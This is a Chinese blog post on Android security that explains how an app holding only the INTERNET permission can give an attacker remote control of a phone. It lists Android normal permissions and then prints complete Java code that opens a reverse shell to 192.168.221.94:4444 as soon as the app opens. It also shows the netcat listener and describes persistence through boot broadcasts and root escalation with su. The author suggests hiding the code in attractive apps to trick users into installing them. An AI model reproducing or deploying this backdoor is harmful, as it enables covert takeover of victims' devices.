【移动安全】安卓设备远程操控提权
最近逛博客的时候看到,一篇关于安卓设备反弹shell的文章,刚好来研究一下技术,文章思路就是通过在受害者设备安装一个app,这个app里面含有恶意代码,可以reverse shell,但是看到这里其实有点疑惑,难道用户会给恶意app权限吗?后面了解到,恶意app只需要 <uses-permission android:name="android.permission.INTERNET"/> 这个normal权限就能实现reverse shell,从而不需要用户授权就可以获取到shell,其实让用户安装app是一件很简单的事情,恶意代码其实可以嵌入各种华丽花哨的app,从而欺骗用户下载
谷歌具有normal权限还有:
<!-- Allows an app to use fingerprint hardware.-->
<permission android:name="android.permission.USE_FINGERPRINT">
<!-- Allows an application to broadcast an Intent to set an alarm for the user.-->
<permission android:name="com.android.alarm.permission.SET_ALARM">
<!-- Allows an application to access extra location provider commands -->
<permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS">
<!-- Allows applications to open network sockets. -->
<permission android:name="android.permission.INTERNET">
<!-- Allows applications to access information about networks -->
<permission android:name="android.permission.ACCESS_NETWORK_STATE">
<!-- Allows applications to access information about Wi-Fi networks. -->
<permission android:name="android.permission.ACCESS_WIFI_STATE">
<!-- Allows applications to change Wi-Fi connectivity state. -->
<permission android:name="android.permission.CHANGE_WIFI_STATE">
<!-- Allows applications to connect to paired bluetooth devices. -->
<permission android:name="android.permission.BLUETOOTH">
<!-- Allows applications to discover and pair bluetooth devices. -->
<permission android:name="android.permission.BLUETOOTH_ADMIN">
<!-- Allows applications to perform I/O operations over NFC. -->
<permission android:name="android.permission.NFC"
<!-- Allows access to the list of accounts in the Accounts Service. -->
<permission android:name="android.permission.GET_ACCOUNTS">
<!-- Allows applications to enter Wi-Fi Multicast mode. -->
<permission android:name="android.permission.CHANGE_WIFI_MULTICAST_STATE">
<!-- Allows access to the vibrator. -->
<permission android:name="android.permission.VIBRATE">
<!-- Allows access to the flashlight. -->
<permission android:name="android.permission.FLASHLIGHT">
<!-- Allows using PowerManager WakeLocks to keep processor from sleeping or screen
from dimming. -->
<permission android:name="android.permission.WAKE_LOCK">
<!-- Allows using the device's IR transmitter, if available. -->
<permission android:name="android.permission.TRANSMIT_IR">
<!-- Allows an application to modify global audio settings. -->
<permission android:name="android.permission.MODIFY_AUDIO_SETTINGS">
<!-- Allows applications to disable the keyguard if it is not secure. -->
<permission android:name="android.permission.DISABLE_KEYGUARD">
<!-- Allows an application to change the Z-order of tasks. -->
<permission android:name="android.permission.REORDER_TASKS">
<!-- Allows an application to call
{@link android.app.ActivityManager#killBackgroundProcesses}. -->
<permission android:name="android.permission.KILL_BACKGROUND_PROCESSES">
<!-- Allows applications to set the wallpaper. -->
<permission android:name="android.permission.SET_WALLPAPER">
<!-- Allows applications to set the wallpaper hints. -->
<permission android:name="android.permission.SET_WALLPAPER_HINTS">
<!-- Allows applications to set the system time zone. -->
<permission android:name="android.permission.SET_TIME_ZONE">
<!-- Allows an application to install a shortcut in Launcher. -->
<permission android:name="com.android.launcher.permission.INSTALL_SHORTCUT">
<!-- Allows applications to read the sync settings. -->
<permission android:name="android.permission.READ_SYNC_SETTINGS">
<!-- Allows applications to read the sync stats. -->
<permission android:name="android.permission.READ_SYNC_STATS">
<!-- Allows an application to find out the space used by any package. -->
<permission android:name="android.permission.GET_PACKAGE_SIZE">
<!-- Allows an application to receive the
{@link android.content.Intent#ACTION_BOOT_COMPLETED} that is
broadcast after the system finishes booting. If you don't
request this permission, you will not receive the broadcast at
that time. Though holding this permission does not have any
security implications, it can have a negative impact on the
user experience by increasing the amount of time it takes the
system to start and allowing applications to have themselves
running without the user being aware of them. As such, you must
explicitly declare your use of this facility to make that visible
to the user. -->
<permission android:name="android.permission.RECEIVE_BOOT_COMPLETED">
<!-- Allows an application to broadcast sticky intents. These are
broadcasts whose data is held by the system after being finished,
so that clients can quickly retrieve that data without having
to wait for the next broadcast. -->
<permission android:name="android.permission.BROADCAST_STICKY">
<!-- Allows applications to change network connectivity state. -->
<permission android:name="android.permission.CHANGE_NETWORK_STATE">
<!-- Allows an application to request installing packages. Apps
targeting APIs greater than 22 must hold this permission in
order to use {@link android.content.Intent#ACTION_INSTALL_PACKAGE}. -->
<permission android:name="android.permission.REQUEST_INSTALL_PACKAGES">
<!-- Marker permission for applications that wish to access notification policy. -->
<permission android:name="android.permission.ACCESS_NOTIFICATION_POLICY">
首先这段恶意代码是这样的:
package com.example.myapplication;
import androidx.appcompat.app.AppCompatActivity;
import android.os.Bundle;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Runnable runnable = new Runnable() {
@Override
public void run() {
try {
String[] cmd = {"/bin/sh", "-i"};
Process proc = Runtime.getRuntime().exec(cmd);
InputStream proc_in = proc.getInputStream();
OutputStream proc_out = proc.getOutputStream();
InputStream proc_err = proc.getErrorStream();
Socket socket = new Socket("192.168.221.94", 4444);
InputStream socket_in = socket.getInputStream();
OutputStream socket_out = socket.getOutputStream();
while (true) {
while (proc_in.available() > 0) socket_out.write(proc_in.read());
while (proc_err.available() > 0) socket_out.write(proc_err.read());
while (socket_in.available() > 0) proc_out.write(socket_in.read());
socket_out.flush();
proc_out.flush();
}
} catch (IOException e) {
e.printStackTrace();
} catch (StringIndexOutOfBoundsException e) {
e.printStackTrace();
}
}
};
new Thread(runnable).start();
}
}一旦app打开,攻击者就会获取手机的控制权,如果用户手机已经root,再输入su就可以达到提权的目的,为了使我们的应用程序持久化,这意味着netcat 每次设备重启、连接更改或用户解锁屏幕时它都会连接到我们的侦听器,我们需要在 AndroidManifest 中包含一个意图过滤器或动态注册广播侦听器,该侦听器将在定义的操作发生时触发并立即执行上述代码并连接到侦听器。
nc -nvlp 4444由于权限的限制,在没有root的情况下,我们能获取的信息很少
获取设备的基本信息:getprop
获取制造商:adb shell getprop ro.product.manufacturer
CopyInsert
获取型号:adb shell getprop ro.product.model
CopyInsert
获取品牌:adb shell getprop ro.product.brand
CopyInsert
获取产品名:adb shell getprop ro.product.name
CopyInsert
获取操作系统版本:adb shell getprop ro.build.version.release
CopyInsert
获取 SDK 版本:adb shell getprop ro.build.version.sdk
浙公网安备 33010602011771号